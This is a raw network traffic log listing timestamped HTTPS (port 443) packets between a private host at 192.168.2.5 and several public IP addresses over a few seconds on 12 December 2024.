Dec 12, 2024 22:40:28.106435061 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.423651934 CET	49766	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.423693895 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.423762083 CET	49766	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.424237967 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.424295902 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.424350977 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.424777031 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.424839973 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.424899101 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.425523996 CET	49766	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.425539970 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.425918102 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.425936937 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.426136017 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.426161051 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.491781950 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.491976976 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.492037058 CET	49753	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.611077070 CET	49753	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.611105919 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.165452003 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.165751934 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.165792942 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.166695118 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.166759014 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.167095900 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.167160034 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.167303085 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.167325020 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.254779100 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.350841999 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:29.385462046 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:29.477041006 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:29.477041006 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:29.620064974 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:29.620110035 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:29.620177984 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:29.620191097 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:29.620722055 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:29.620738029 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:29.620812893 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:29.621404886 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:29.621421099 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:29.621452093 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:29.621462107 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:29.621505022 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:29.846800089 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:29.846998930 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:29.847234964 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:29.847383976 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:29.847700119 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:29.847713947 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:29.847990990 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:29.848006964 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:29.879302025 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.894745111 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.894783020 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.896321058 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.918442011 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.920342922 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.920407057 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.920484066 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.920561075 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.920607090 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.935795069 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.936068058 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:29.946825981 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:29.946903944 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.059334040 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:30.059390068 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:30.059412956 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.063678980 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.063719988 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.139852047 CET	49771	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.139955044 CET	443	49771	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.140043974 CET	49771	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.140258074 CET	49771	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.140294075 CET	443	49771	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.156286955 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.156697035 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.156851053 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.157247066 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.157257080 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.157509089 CET	49766	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.157536983 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.157902002 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.157936096 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.158051014 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.158287048 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.158359051 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.159979105 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.160046101 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.160505056 CET	49766	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.160595894 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.161336899 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.161411047 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.161740065 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.161746979 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.161858082 CET	49766	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.161917925 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.162388086 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.162477016 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.162573099 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.162586927 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.264028072 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.353842974 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.353893042 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.353926897 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.353944063 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.353955030 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.353966951 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.354012966 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.361778975 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.361824036 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.366909981 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.367338896 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.367409945 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.373132944 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.373193979 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.373209953 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.385611057 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.385660887 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.385668993 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.471991062 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:30.472682953 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:30.472734928 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:30.472793102 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:30.474493027 CET	49779	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:30.474540949 CET	443	49779	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:30.474771976 CET	49779	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:30.475637913 CET	49779	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:30.475663900 CET	443	49779	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:30.477762938 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.477819920 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.477834940 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.557190895 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.557251930 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.557276011 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.565929890 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.565982103 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.565995932 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.582076073 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.582138062 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.582149029 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.590857983 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.590914011 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.590920925 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.599587917 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.599642038 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.599649906 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.606722116 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.606777906 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.606785059 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.616554976 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.616604090 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.616615057 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.629348993 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.629419088 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.629426003 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.642335892 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.642395020 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.642405033 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.648207903 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.648269892 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.648318052 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.648320913 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.648346901 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.648401022 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.648407936 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.655323029 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.655380011 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.655390978 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.663769007 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.663829088 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.663830042 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.663861990 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.663898945 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.667959929 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.673224926 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.673283100 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.673290014 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.688313961 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.688374996 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.688386917 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.690713882 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.690882921 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.690915108 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.760312080 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.760360956 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.760422945 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.760442019 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.760608912 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.762317896 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.765038013 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.768035889 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.768471003 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.768537998 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.768546104 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.770694971 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.770761013 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.770770073 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.785749912 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.785825968 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.785837889 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.812195063 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.812553883 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.812565088 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.846010923 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.846071959 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.846101046 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.856544018 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.856612921 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.856622934 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.860675097 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.860717058 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.860724926 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.866720915 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.866774082 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.866781950 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.871332884 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.871381044 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.871387959 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.871646881 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.871711969 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.871742964 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.871840000 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.871931076 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.871938944 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.874592066 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.874649048 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.874655962 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.876436949 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.876485109 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.876492023 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.876964092 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.877019882 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.877042055 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.879307985 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.879362106 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.879369974 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.882328033 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.882374048 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.882380962 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.885057926 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.885234118 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.885272026 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.888531923 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.888587952 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.888595104 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.895756960 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.895927906 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.895952940 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.897800922 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.897881031 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.897886992 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.903821945 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.903878927 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.903902054 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.906758070 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.906804085 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.906810999 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.910293102 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.910340071 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.932851076 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.932893991 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.932967901 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.932977915 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.933284998 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.934365988 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.936969995 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.937005043 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.937016964 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.937024117 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.937076092 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.941543102 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.946976900 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.947046995 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.947056055 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.952701092 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.952744961 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.952758074 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.957905054 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.957930088 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.957962990 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.957973003 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.958019018 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.958798885 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.958862066 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:30.958906889 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:30.964816093 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.964888096 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.964952946 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:30.964967966 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:30.965008020 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.023089886 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.023207903 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.023298979 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.023739100 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.023932934 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.024022102 CET	49766	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.030246973 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.030277014 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.104651928 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:31.104669094 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:31.105628967 CET	49783	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.105674028 CET	443	49783	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.105869055 CET	49783	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.122407913 CET	49767	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.122454882 CET	443	49767	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.123600006 CET	49783	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.123615980 CET	443	49783	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.124636889 CET	49768	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.124672890 CET	443	49768	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.125632048 CET	49766	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.125638008 CET	443	49766	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.170125961 CET	49784	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.170182943 CET	443	49784	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.170408010 CET	49784	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.170433044 CET	49785	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.170515060 CET	443	49785	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.170588017 CET	49785	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.170651913 CET	49786	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.170663118 CET	443	49786	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.170733929 CET	49786	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.170802116 CET	49787	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.170821905 CET	443	49787	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.170881033 CET	49787	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.171010971 CET	49788	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.171056986 CET	443	49788	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.171098948 CET	49788	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.171246052 CET	49789	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.171272993 CET	443	49789	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.171344042 CET	49789	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.171696901 CET	49784	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.171714067 CET	443	49784	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.171894073 CET	49785	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.171926022 CET	443	49785	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:31.172148943 CET	49787	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:31.172174931 CET	443	49787	142.250.181.132	192.168.2.5
